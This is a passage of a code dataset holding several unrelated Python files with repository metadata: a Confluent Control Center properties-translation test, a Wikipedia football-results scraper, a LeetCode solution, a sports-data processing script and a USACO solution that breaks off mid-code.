set\nsupport_props = dict(\n CONFLUENT_SUPPORT_METRICS_ENABLE=\"confluent.support.metrics.enable\",\n CONFLUENT_SUPPORT_METRICS_SEGMENT_ID=\"confluent.support.metrics.segment.id\"\n)\n\n# complete set\nspecial_props = dict(\n CONFIG_PROVIDERS=\"config.providers\",\n CONFIG_PROVIDERS_SECUREPASS_CLASS=\"config.providers.securepass.class\",\n CONTROL_CENTER_LICENSE=\"confluent.license\",\n PUBLIC_KEY_PATH=\"public.key.path\"\n)\n\n# env_to_c3_prop_lookup: a map from environment property to correctly translated c3 property\nenv_to_c3_prop_lookup = {\n **required_props,\n **monitoring_props,\n **control_center_metrics_props,\n **confluent_metrics_props,\n **special_props,\n **c3_optional_props,\n **metadata_props,\n **support_props\n}\n\n\nclass PropsTranslationTest(unittest.TestCase):\n # test_env: a map from environment property to its expected value\n test_env = None\n\n # filled_template: a list of translated c3 property to its actual value\n # e.x. [ [ 'prop1','val1' ], [ 'prop2','val2' ] ]\n filled_template = None\n\n @classmethod\n def set_up_test_env(cls, test_env_props):\n cls.test_env = dict()\n for test_env_prop in test_env_props:\n # each property has a unique value. for example, { 'CONTROL_CENTER_ID' : '9999' }\n cls.test_env[test_env_prop] = str(random.randint(0, 10000))\n\n @classmethod\n def fill_template(cls):\n template_file = \"/etc/confluent/docker/control-center.properties.template\"\n\n j2_env = Environment(\n loader=FileSystemLoader(searchpath=\"../include\"),\n trim_blocks=True)\n j2_env.globals['env_to_props'] = dub.env_to_props\n template = j2_env.get_template(template_file)\n\n # fill the template with environment variable, split each line, filter out\n # the empty lines, then convert to a list\n actual = list(filter(None, template.render(env=os.environ).splitlines()))\n\n # split each property. for example line confluent.controlcenter.id=1 becomes\n # ['confluent.controlcenter.id', '1']\n cls.filled_template = list(line.split(\"=\") for line in actual)\n\n @classmethod\n def configure_partially(cls, props):\n # always randomly choose 1 prop from the list of props\n configured_props = [random.choice(list(props.keys()))]\n not_configured_props = props.keys() - configured_props\n return configured_props, not_configured_props\n\n @classmethod\n def check_translations(cls, env_props):\n # assume env_prop = 'CONTROL_CENTER_ID'\n for env_prop in env_props:\n # c3_prop is the correct c3 prop translation, which is 'confluent.controlcenter.id'\n c3_prop = env_to_c3_prop_lookup[env_prop]\n # assume expected_val = '9999'\n expected_val = cls.test_env[env_prop]\n # check if in the template file, confluent.controlcenter.id = 9999 as well\n cls.check_single_translation(c3_prop, expected_val)\n\n @classmethod\n def check_single_translation(cls, c3_prop, expected_val):\n # The translation from docker prop to c3 prop was correct, now assert the\n # value of the prop is correct.\n assert [c3_prop, expected_val] in cls.filled_template, \\\n \"For property %s expected val %s. This is the actual filled template: %s\" \\\n % (c3_prop, expected_val, cls.filled_template)\n\n @classmethod\n def check_filled_template_length(cls, expected_len=0):\n actual_len = len(cls.filled_template)\n assert expected_len == actual_len, \\\n \"filled template expected length %s, got %s\" % (expected_len, actual_len)\n\n def test_missing_required_properties(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of required vs. not required.\n\n Test that when no environment variable is set, required properties are set with empty\n string.\n\n :return: pass if when no environment variable is set, required properties are set with \"\"\n \"\"\"\n configured_props, not_configured_props = self.configure_partially(required_props)\n self.set_up_test_env(test_env_props=configured_props)\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # all required props show up, regardless of if they are configured or not\n self.check_filled_template_length(expected_len=len(required_props))\n\n # required props that are configured show up with actual values\n self.check_translations(env_props=configured_props)\n\n # required props that are not configured show up with empty string\n for not_configured_prop in not_configured_props:\n c3_prop = env_to_c3_prop_lookup[not_configured_prop]\n assert [c3_prop, \"\"] in self.filled_template, \\\n \"required property %s should be empty since no environment variable is set\"\n\n def test_missing_optional_properties(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of required vs. not required.\n\n Test that when no environment variable is set, optional properties are not set at all.\n\n Important to note: this test only uses monitoring_props to test that optional properties\n are not set if no environment variable is present. However, the same logic is applicable to\n other_props, \"CONFLUENT_METADATA_*\", \"CONFLUENT_SUPPORT_*\", \"CONTROL_CENTER_*\" properties\n as well.\n\n :return: pass if when no environment variable is set, optional properties are not set\n \"\"\"\n configured_props, not_configured_props = self.configure_partially(monitoring_props)\n self.set_up_test_env(test_env_props=configured_props)\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # however, optional props only show up if they are actually configured.\n self.check_filled_template_length(\n expected_len=len(required_props) + len(configured_props))\n\n # optional props that are configured show up with actual values\n self.check_translations(env_props=configured_props)\n\n # optional props that are not configured shouldn't show up at all\n actual_props = [li[0] for li in self.filled_template]\n for not_configured_prop in not_configured_props:\n c3_prop = env_to_c3_prop_lookup[not_configured_prop]\n assert c3_prop not in actual_props, \"property %s shouldn't be set\" % c3_prop\n\n def test_rf_properties_precedence(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of precedence.\n\n 1. Test that replication factor properties default to CONTROL_CENTER_REPLICATION_FACTOR\n\n pass if confluent.controlcenter.internal.topics.replication\n confluent.controlcenter.command.topic.replication\n confluent.metrics.topic.replication\n confluent.monitoring.interceptor.topic.replication\n default to use CONTROL_CENTER_REPLICATION_FACTOR when they're not set.\n\n 2. Test that replication factor properties use their own value\n\n pass if the four rf props use their own value when corresponding env variable is set,\n even though CONTROL_CENTER_REPLICATION_FACTOR is present as well.\n\n :return: pass if both tests pass\n \"\"\"\n # 1. Test that replication factor properties default to CONTROL_CENTER_REPLICATION_FACTOR\n self.set_up_test_env(test_env_props=['CONTROL_CENTER_REPLICATION_FACTOR'])\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n # check that all rf props default to the value of CONTROL_CENTER_REPLICATION_FACTOR\n for rf_prop in rf_props.keys():\n self.check_single_translation(\n c3_prop=rf_props[rf_prop],\n expected_val=self.test_env['CONTROL_CENTER_REPLICATION_FACTOR'])\n\n # 2. Test that replication factor properties use their own value\n self.set_up_test_env(test_env_props=['CONTROL_CENTER_REPLICATION_FACTOR'] + list(rf_props.keys()))\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n # check that all rf props use their own value even though CONTROL_CENTER_REPLICATION_FACTOR is configured\n for rf_prop in rf_props.keys():\n self.check_single_translation(\n c3_prop=rf_props[rf_prop],\n expected_val=self.test_env[rf_prop])\n\n def test_metrics_rf_properties_precedence(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of precedence, specifically metrics rf props.\n\n Test that confluent.metrics.topic.replication respect the following precedence:\n CONTROL_CENTER_METRICS_TOPIC_REPLICATION >\n CONFLUENT_METRICS_TOPIC_REPLICATION >\n CONTROL_CENTER_REPLICATION_FACTOR\n\n :return: pass if confluent.metrics.topic.replication respects the precedence\n \"\"\"\n # 1. Test CONTROL_CENTER_METRICS_TOPIC_REPLICATION should take precedence\n self.set_up_test_env(\n test_env_props=[\n 'CONTROL_CENTER_METRICS_TOPIC_REPLICATION',\n 'CONFLUENT_METRICS_TOPIC_REPLICATION',\n 'CONTROL_CENTER_REPLICATION_FACTOR'\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_REPLICATION'])\n\n # 2. Test CONFLUENT_METRICS_TOPIC_REPLICATION should take precedence\n self.set_up_test_env(\n test_env_props=[\n 'CONFLUENT_METRICS_TOPIC_REPLICATION',\n 'CONTROL_CENTER_REPLICATION_FACTOR'\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.replication',\n expected_val=self.test_env['CONFLUENT_METRICS_TOPIC_REPLICATION'])\n\n def test_bad_prefix_properties(self):\n \"\"\"\n Testing SET_PROPERTIES_WITH_SKIP_PROP_CHECK's logic of checking bad prefix.\n\n Test that SET_PROPERTIES_WITH_SKIP_PROP_CHECK avoids adding properties that start with\n CONTROL_CENTER_METRICS_ (aka. confluent.controlcenter.metrics.) and those that start with\n CONTROL_CENTER_MONITORING_INTERCEPTOR_ (aka. confluent.controlcenter.monitoring.interceptor.)\n because these properties are special cases and are falsely translated, even though they\n have the regular prefix CONTROL_CENTER_.\n\n :return: pass if SET_PROPERTIES_WITH_SKIP_PROP_CHECK avoids adding properties with bad prefix.\n \"\"\"\n self.set_up_test_env(\n test_env_props=[\n # translated because ok prefix (logic of SET_PROPERTIES_WITH_ENV_TO_PROPS)\n 'CONTROL_CENTER_METRICS_TOPIC',\n # translated because ok prefix but overwritten by the prev prop (logic of SET_PROPERTIES_WITH_ENV_TO_PROPS)\n 'CONFLUENT_METRICS_TOPIC',\n # falsely translated because it starts with CONTROL_CENTER_ but not CONTROL_CENTER_METRIC_ (logic of SET_PROPERTIES_WITH_SKIP_PROP_CHECK)\n 'CONTROL_CENTER_METRIC_TOPIC',\n # won't get translated because bad prefix\n 'CONFLUENT_METRIC_TOPIC',\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n self.check_filled_template_length(expected_len=len(required_props) + 2)\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC'])\n\n self.check_single_translation(\n c3_prop='confluent.controlcenter.metric.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRIC_TOPIC'])\n\n def test_metrics_properties_precedence(self):\n \"\"\"\n Testing SET_PROPERTIES_WITH_ENV_TO_PROPS_WITH_TWO_PREFIXES's logic of precedence.\n\n Test that SET_PROPERTIES_WITH_ENV_TO_PROPS_WITH_TWO_PREFIXES respects the precedence of\n primary_env_prefix >>> secondary_env_prefix, and that the same property is not set twice.\n\n :return: pass if\n - confluent.metrics.topic is only set with CONTROL_CENTER_METRICS_TOPIC. We shouldn't\n find it being translated twice.\n - confluent.metrics.topic.partitions is only set with CONTROL_CENTER_METRICS_TOPIC_PARTITIONS\n - confluent.metrics.topic.retention.ms is only set with CONFLUENT_METRICS_TOPIC_RETENTION_MS\n \"\"\"\n self.set_up_test_env(\n test_env_props=[\n # CONTROL_CENTER_METRICS_ takes precedence\n 'CONTROL_CENTER_METRICS_TOPIC',\n 'CONFLUENT_METRICS_TOPIC',\n\n # CONTROL_CENTER_METRICS_ takes precedence\n 'CONTROL_CENTER_METRICS_TOPIC_PARTITIONS',\n\n # CONFLUENT_METRICS_ takes precedence\n 'CONFLUENT_METRICS_TOPIC_RETENTION_MS'\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n self.check_filled_template_length(expected_len=len(required_props) + 3)\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC'])\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.partitions',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_PARTITIONS'])\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.retention.ms',\n expected_val=self.test_env['CONFLUENT_METRICS_TOPIC_RETENTION_MS'])\n\n def test_comprehensive(self):\n \"\"\"\n Testing SET_PROPERTIES, SET_PROPERTIES_WITH_ENV_TO_PROPS, and\n SET_PROPERTIES_WITH_SKIP_PROP_CHECK 's logic combined.\n\n Test the properties translation comprehensively.\n\n :return: pass if all properties' translation and precedence are correct\n \"\"\"\n # rf props should ignore \"CONTROL_CENTER_REPLICATION_FACTOR\" because of precedence\n configured_rf_props = list(rf_props.keys()) + [\"CONTROL_CENTER_REPLICATION_FACTOR\"]\n\n # metrics props should ignore \"CONFLUENT_METRICS_*\" because of precedence\n configured_metrics_props = list(control_center_metrics_props.keys()) + \\\n list(confluent_metrics_props.keys())\n\n # monitoring props should be partially set because they're optional props\n configured_monitoring_props, _ = self.configure_partially(monitoring_props)\n\n # other props should ignore \"CONTROL_CENTER_CONFLUENT_LICENSE\" because of precedence and\n # should be partially set because they're optional props\n configured_other_props = list(special_props.keys()) + [\"CONTROL_CENTER_CONFLUENT_LICENSE\"]\n\n # c3 optional props should be partially set because they're optional props\n configured_c3_optional_props, _ = self.configure_partially(c3_optional_props)\n\n # metadata props should be partially set because they're optional props\n configured_metadata_props, _ = self.configure_partially(metadata_props)\n\n # support props should be partially set because they're optional props\n configured_support_props, _ = self.configure_partially(support_props)\n\n self.set_up_test_env(test_env_props=list(basic_props.keys()) +\n configured_rf_props +\n configured_metrics_props +\n configured_monitoring_props +\n configured_other_props +\n configured_c3_optional_props +\n configured_metadata_props +\n configured_support_props)\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n to_check = [basic_props.keys(),\n rf_props.keys(),\n control_center_metrics_props.keys(),\n configured_monitoring_props,\n special_props,\n configured_c3_optional_props,\n configured_metadata_props,\n configured_support_props]\n\n self.check_filled_template_length(expected_len=sum([len(li) for li in to_check]))\n\n for li in to_check:\n self.check_translations(env_props=li)\n\n def test_comprehensive_concrete_example(self):\n self.set_up_test_env(\n test_env_props=[\n # copied from cp-all-in-one\n 'CONTROL_CENTER_BOOTSTRAP_SERVERS',\n 'CONTROL_CENTER_KSQL_KSQLDB1_URL',\n 'CONTROL_CENTER_KSQL_KSQLDB1_ADVERTISED_URL',\n 'CONTROL_CENTER_SCHEMA_REGISTRY_URL',\n 'CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_CREDENTIALS_SOURCE',\n 'CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_USER_INFO',\n 'CONTROL_CENTER_CONNECT_CONNECT-DEFAULT_CLUSTER',\n 'CONTROL_CENTER_STREAMS_SECURITY_PROTOCOL',\n 'CONTROL_CENTER_STREAMS_SASL_JAAS_CONFIG',\n 'CONTROL_CENTER_STREAMS_SASL_MECHANISM',\n 'CONTROL_CENTER_REPLICATION_FACTOR',\n 'CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_REPLICATION',\n 'CONTROL_CENTER_INTERNAL_TOPICS_REPLICATION',\n 'CONTROL_CENTER_COMMAND_TOPIC_REPLICATION',\n 'CONTROL_CENTER_METRICS_TOPIC_REPLICATION',\n 'CONFLUENT_METRICS_TOPIC_REPLICATION',\n 'CONTROL_CENTER_STREAMS_NUM_STREAM_THREADS',\n 'CONTROL_CENTER_INTERNAL_TOPICS_PARTITIONS',\n 'CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_PARTITIONS',\n 'CONTROL_CENTER_METRICS_TOPIC_MAX_MESSAGE_BYTES',\n\n # special props\n 'CONFIG_PROVIDERS',\n 'CONFIG_PROVIDERS_SECUREPASS_CLASS',\n 'CONTROL_CENTER_LICENSE',\n 'CONTROL_CENTER_CONFLUENT_LICENSE',\n 'PUBLIC_KEY_PATH',\n\n # props with bad prefix\n 'CONTROL_CENTER_METRIC_TOPIC',\n 'CONTROL_CENTER_MONITORING_TOPIC',\n\n # metrics topic precedence\n 'CONTROL_CENTER_METRICS_TOPIC_RETENTION_MS',\n 'CONFLUENT_METRICS_TOPIC_RETENTION_MS'\n ]\n )\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n self.check_filled_template_length(expected_len=25)\n\n # copied from cp-all-in-one\n self.check_single_translation(\n c3_prop='bootstrap.servers',\n expected_val=self.test_env['CONTROL_CENTER_BOOTSTRAP_SERVERS'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.ksql.ksqldb1.url',\n expected_val=self.test_env['CONTROL_CENTER_KSQL_KSQLDB1_URL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.ksql.ksqldb1.advertised.url',\n expected_val=self.test_env['CONTROL_CENTER_KSQL_KSQLDB1_ADVERTISED_URL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.schema.registry.url',\n expected_val=self.test_env['CONTROL_CENTER_SCHEMA_REGISTRY_URL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.schema.registry.basic.auth.credentials.source',\n expected_val=self.test_env['CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_CREDENTIALS_SOURCE'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.schema.registry.basic.auth.user.info',\n expected_val=self.test_env['CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_USER_INFO'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.connect.connect-default.cluster',\n expected_val=self.test_env['CONTROL_CENTER_CONNECT_CONNECT-DEFAULT_CLUSTER'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.security.protocol',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_SECURITY_PROTOCOL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.sasl.jaas.config',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_SASL_JAAS_CONFIG'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.sasl.mechanism',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_SASL_MECHANISM'])\n self.check_single_translation(\n c3_prop='confluent.monitoring.interceptor.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.internal.topics.replication',\n expected_val=self.test_env['CONTROL_CENTER_INTERNAL_TOPICS_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.command.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_COMMAND_TOPIC_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.num.stream.threads',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_NUM_STREAM_THREADS'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.internal.topics.partitions',\n expected_val=self.test_env['CONTROL_CENTER_INTERNAL_TOPICS_PARTITIONS'])\n self.check_single_translation(\n c3_prop='confluent.monitoring.interceptor.topic.partitions',\n expected_val=self.test_env['CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_PARTITIONS'])\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.max.message.bytes',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_MAX_MESSAGE_BYTES'])\n\n # special props\n self.check_single_translation(\n c3_prop='config.providers',\n expected_val=self.test_env['CONFIG_PROVIDERS'])\n self.check_single_translation(\n c3_prop='config.providers.securepass.class',\n expected_val=self.test_env['CONFIG_PROVIDERS_SECUREPASS_CLASS'])\n self.check_single_translation(\n c3_prop='confluent.license',\n expected_val=self.test_env['CONTROL_CENTER_LICENSE'])\n self.check_single_translation(\n c3_prop='public.key.path',\n expected_val=self.test_env['PUBLIC_KEY_PATH'])\n\n # props with bad prefix\n self.check_single_translation(\n c3_prop='confluent.controlcenter.metric.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRIC_TOPIC'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.monitoring.topic',\n expected_val=self.test_env['CONTROL_CENTER_MONITORING_TOPIC'])\n\n # metrics topic precedence\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.retention.ms',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_RETENTION_MS'])\n\n # required props that weren't configured get empty string\n self.check_single_translation(\n c3_prop='confluent.controlcenter.data.dir',\n expected_val=\"\")\n self.check_single_translation(\n c3_prop='zookeeper.connect',\n expected_val=\"\")\n","repo_name":"confluentinc/control-center-images","sub_path":"control-center/test/test_control_center_props_validation.py","file_name":"test_control_center_props_validation.py","file_ext":"py","file_size_in_byte":27336,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"75058256884","text":"\nimport sys\nimport requests\nfrom bs4 import element\nfrom bs4 import BeautifulSoup\nfrom typing import List\nimport re\nfrom unicodedata import normalize\nleagues = {'EPL':2000,'LaLiga':2000,'Bundesliga':2000,'Serie A':2000}\n\n\n\n\n\ndef BuildLink(league: str, year: int)->str:\n if league == 'EPL':\n if year>2006:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:]+\"_Premier_League\"\n elif year<=2006 and year>=1992:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:]+\"_FA_Premier_League\"\n else:\n raise Exception(\"Sorry that year is not in record\")\n elif league == 'LaLiga':\n if year == 1999:\n return \"https://en.wikipedia.org/wiki/1999-2000_La_Liga\"\n elif year>=1997:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:] +\"_La_Liga\"\n raise Exception(\"Sorry that year is not in record\")\n elif league == 'Bundesliga':\n if year == 1999:\n return \"https://en.wikipedia.org/wiki/1999-2000_Bundesliga\"\n if year>=1963:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:] +\"_Bundesliga\"\n elif league == 'Serie A':\n if year>= 1955:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:] +\"_Serie_A\"\n raise Exception(\"Sorry, this leagues is not supported? Try using on of these:\",leagues)\ndef GetTeams(teams: List[element.Tag] )->List[str]: #takes in a soup element tag( i.e the table) and gets all the teams an returns it in a list\n teamNames = []\n for i in range(len(teams)):\n if i==0:\n continue\n if teams[i].find(\"th\").find(\"a\") is None:\n teamNames += [\" \".join( teams[i].find(\"th\").get_text(strip=True).replace('\\n','').replace(u'\\xa0',u' ').split())]\n else:\n teamNames += [ \" \".join( teams[i].find(\"th\").find(\"a\").get_text(strip=True).replace('\\n', '').replace(u'\\xa0',u' ').split())]\n #\\xa0 is caused by an error in 2016 LaLiga!\n print(teamNames)\n return teamNames\ndef BreakDownTable(teams : List[element.Tag] ) -> dict:\n Games = {} # performance by dict with keys are the team name and the value is a list of home games\n teamNames = GetTeams(teams)#gets team names\n for i in range(len(teams)):#goes through the rows of table\n if i==0:#ignore the first one since it just has the team names that are shortended\n continue\n\n if teams[i].find(\"th\").find(\"a\") is None:\n teamName = \" \".join( teams[i].find(\"th\").get_text(strip=True).replace('\\n','').replace(u'\\xa0',u' ').split())\n else:\n teamName = \" \".join(teams[i].find(\"th\").find(\"a\").get_text(strip=True).replace('\\n', '').replace(u'\\xa0',u' ').split())# get the team name\n Games[teamName] = []# make a list of all the games played at home\n j=0\n for game in teams[i].find_all('td'):\n if re.compile(\"\\d+\").match(game.text.replace('\\n', '')):\n awayTeam = teamNames[j].replace('\\n', '')\n res = ''.join(c for c in game.text[:-1] if c.isdigit() or c=='–')\n Games[teamName] += [(res,awayTeam)]# added with score string then away team\n j+=1\n\n return Games\ndef GetGames(league,season):\n targetLeague = league\n targetSeason = season\n page = requests.get(BuildLink(targetLeague,targetSeason))\n\n soup = BeautifulSoup(page.content, 'html.parser')\n table = soup.find(\"table\", class_=\"wikitable plainrowheaders\")\n L = BreakDownTable(table.find_all('tr') )\n #print(L)\n return L\nif __name__ == \"__main__\":\n targetLeague = sys.argv[1]\n targetSeason = int(sys.argv[2])\n page = requests.get(BuildLink(targetLeague,targetSeason))\n\n soup = BeautifulSoup(page.content, 'html.parser')\n table = soup.find(\"table\", class_=\"wikitable plainrowheaders\")\n\n print(BreakDownTable(table.find_all('tr') ) )\n","repo_name":"jom9/footballelo","sub_path":"set_data/scrapeSeason.py","file_name":"scrapeSeason.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15615594599","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n #finding the lowest valley followed by the highest peak (biggest difference)\n min_price = float('inf')\n max_profit = 0\n \n #iterate through prices array \n for i in range(len(prices)):\n #if the current price is lower than the min price then update min_price\n if prices[i] < min_price:\n min_price = prices[i]\n #if the current profit is higher than max profit so far update max_profit\n elif prices[i] - min_price > max_profit:\n max_profit = prices[i] - min_price\n \n return max_profit\n","repo_name":"jjjustyn/leetcode-solutions","sub_path":"121_Best_Time_to_Buy_and_Sell_Stock.py","file_name":"121_Best_Time_to_Buy_and_Sell_Stock.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12829050434","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport heapq\n\ndirs = os.listdir(\"C:/Users/Administrator/Desktop/WSY_data/origin\")\nfor all_files in dirs:\n # 读取原始数据\n file = \"C:/Users/Administrator/Desktop/WSY_data/origin/\" + all_files + \"\"\n OLC1 = pd.read_csv(file)\n OLC2 = pd.read_csv(file)\n OLC1[\"VBT\"][OLC1[\"VBT\"] <= 0.05] = 0 # 向心补零\n OLC2[\"VBT\"][OLC2[\"VBT\"] >= -0.05] = 0 # 向心补零\n OLC2[OLC2 >= -0.05] = 0 # 离心补零\n\n OLC1[\"VBT\"] = OLC1[\"VBT\"][OLC1[\"VBT\"] >= 0.05] # 向心\n OLC2[\"VBT\"] = OLC2[\"VBT\"][OLC2[\"VBT\"] <= -0.05] # 向心\n # OLC2 = OLC2[OLC2 <= -0.05] # 离心\n plt.figure(1)\n # plt.plot(OLC1['y'], linewidth=0.4, color='blue', label='OPTI')\n plt.plot(OLC1['VBT'], linewidth=0.4, color='red', label='VBT')\n plt.show()\n # plt.figure(2)\n # plt.plot(OLC2['y'], linewidth=0.4, color='blue', label='OPTI')\n plt.plot(OLC2['VBT'], linewidth=0.4, color='blue', label='VBT')\n plt.show()\n\n centric = pd.DataFrame()\n eccentric = pd.DataFrame()\n centric[\"Opti\"] = OLC1[\"Opti\"]\n centric[\"VBT\"] = OLC1[\"VBT\"]\n eccentric[\"Opti\"] = OLC2[\"Opti\"]\n eccentric[\"VBT\"] = OLC2[\"VBT\"]\n\n # print(OLC)\n\n centric.to_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\WSY_data\\\\concentric\\\\\" + all_files + \"\", index=False)\n eccentric.to_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\WSY_data\\\\eccentric\\\\\" + all_files + \"\", index=False)\n # OLC2.to_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\OLC\\\\%rm\\\\75%B\\\\\" + all_files + \"\", index=False)\n","repo_name":"Logan9872/Velocity_Based_Training_Data_Process","sub_path":"WSY/向心离心阶段分离.py","file_name":"向心离心阶段分离.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33661634382","text":"\"\"\"\nID: wrwwctb1\nLANG: PYTHON3\nTASK: hidden\n5.5.2\n\nkey idea\n\ncyclic => concat 2 copies\n\nprerequisite:\none (not the best) way to test if two strings are cyclic shifts of each other\nref: https://jim-think.blogspot.com/2012/07/usaco-hidden-password.html\nimplementation: isCyclicShifts2\nexplanation:\nsuppose s1 and s2 are cyclic shifts of each other. suppose sm is the min cyclic\nshift of both. suppose M(s1) is the min start loc of sm in s1. M(s2) defined\nsimilarly. i/j points at s1/s2. maintain invariant: i <= M(s1) and j <= M(s2).\nat some i j, we find the first k >= 0 s.t s1[i+k] != s2[j+k]. if s1 and s2\nremains the same even if k reaches L, we found the cyclic match. otherwise,\nsuppose s2[j+k] > s1[i+k]. this guarantees that M(s2) cannot be in [j, j+k].\nthis allows us to advance j by k + 1.\n\nback to usaco hidden:\nconcat input by itself. compare it with itself using the algo above, but never\nallows i == j (or else we simply find that the string matches itself.) once i\nor j lands on M(s), the other will be pushed to L or beyond.\n\n\n\n\n\n\nn^2 methods:\n brute force: concat. strncmp L. can pass with c\n ring linked list, compare every shift (constant shift, linear compare)\n stock span, weed out suboptimal (consider 'ab'* 50000)\n\nusaco linear sol is complicated\ns = original str\nss = original str concat 2 copies\nv[i] = k:\n for all substrings ss[i:i+length],\n k is the longest length s.t. ss[i:i+k] is the smallest among all ss's substrings of length k\n\"\"\"\n\nimport os, sys, re, time\nfrom collections import Counter, deque, defaultdict\nfrom queue import Queue\nfrom copy import copy, deepcopy\nfrom itertools import combinations, permutations, accumulate, \\\n combinations_with_replacement\nfrom functools import lru_cache, cmp_to_key, partial as functools_partial\nfrom heapq import heappush, heappop, nlargest, nsmallest\nfrom bisect import bisect_left, bisect_right\nfrom math import ceil, floor, factorial, gcd, modf, log, log2, log10, sqrt, \\\n pi, sin, cos, tan, asin, acos, atan, atan2, hypot, erf, erfc, inf, nan\n# sys.setrecursionlimit(5782)\n# python -m cProfile -s time ha.py\n\nprint = functools_partial(print, flush=True)\ninput = lambda: fin.readline().strip('\\n')\n\ndef printwrite(string):\n print(string)\n fout.write(str(string) + '\\n')\n\nfilename = 'hidden'\nfin = open(filename + '.in', 'r')\nfout = open(filename + '.out', 'w')\n\n\n\n\n\n\n\n'''\ndef isCyclicShifts2(s1, s2):\n L = len(s1)\n if len(s2) != L:\n return False\n if L == 0:\n return True\n s1 = s1 + s1\n s2 = s2 + s2\n i = 0\n j = 0\n while i < L and j < L:\n # find first difference\n k = 0\n while k < L and s1[i + k] == s2[j + k]: # i + k, j + k always < 2L\n k += 1\n # found the cyclic match\n if k == L:\n return True\n # advance\n if s1[i + k] < s2[j + k]:\n j += k + 1\n else:\n 